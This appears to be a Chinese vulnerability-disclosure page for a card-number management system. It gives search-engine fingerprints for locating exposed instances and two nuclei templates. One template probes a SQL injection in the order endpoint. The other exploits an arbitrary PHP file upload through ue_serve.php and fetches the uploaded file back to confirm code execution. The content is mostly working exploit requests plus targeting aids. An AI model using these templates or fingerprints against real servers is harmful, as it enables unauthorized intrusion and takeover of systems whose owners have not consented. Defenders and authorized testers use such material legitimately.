跳到主要内容

卡号极团管理系统

卡号极团管理系统 order 接口存在SQL注入

fofa:icon_hash="-795291075"

quake:favicon: "2663e830c0a3677d97f6debf90ec9e4a"

hunter:web.icon="2663e830c0a3677d97f6debf90ec9e4a"

image-20240506011445537

image-20240506014021521

image-20240506013936419

nuclei

id: haokajituan-sql

info:
  name: haokajituan-sql
  author: BY
  severity: high
  tags: haokajituan

http:
- raw:
  - |
    GET /order/index.php?pid=1' HTTP/1.1
    Host: {{Hostname}}

  max-redirects: 3
  matchers:
  - type: word
    part: body
    words:
      - "syntax"

image-20240506013047339

卡号极团管理系统ue_serve.php 存在任意文件上传

fofa:icon_hash="-795291075"

quake:favicon: "2663e830c0a3677d97f6debf90ec9e4a"

hunter:web.icon="2663e830c0a3677d97f6debf90ec9e4a"

image-20240506011445537

image-20240506025153566

nuclei

id: haokajituan-fileupload-ue_serve
info:
  name: haokajituan-fileupload-ue_serve
  author: BY
  severity: critical
  description: 卡号极团管理系统ue_serve.php 存在任意文件上传
  tags: haokajituan

variables:
  boundary: "{{rand_base(6)}}"
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/2
        Host: {{Hostname}}
        Cookie: PHPSESSID=ecq4ucplk5n6e3ipihvktl103r
        Sec-Ch-Ua: "Not;A=Brand";v="99", "Chromium";v="106"
        Sec-Ch-Ua-Platform: "Windows"
        Sec-Ch-Ua-Mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylkv1kpsZgzw2WC03
        Accept: */*
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Content-Length: 301

        ------WebKitFormBoundarylkv1kpsZgzw2WC03
        Content-Disposition: form-data; name="name"

        {{filename}}.php

        ------WebKitFormBoundarylkv1kpsZgzw2WC03
        Content-Disposition: form-data; name="upfile"; filename="{{filename}}.php"
        Content-Type: image/jpeg

        <?php echo "{{boundary}}";unlink(__FILE__); ?>

        ------WebKitFormBoundarylkv1kpsZgzw2WC03--
        
      - |
        GET /upload/{{name}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0

    extractors:
      - type: regex
        name: name
        part: body
        internal: true
        regex:
          - "[A-Za-z0-9]+_[A-Za-z0-9]+.php"
      
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200 && contains(body_2,'{{boundary}}')

image-20240506025110658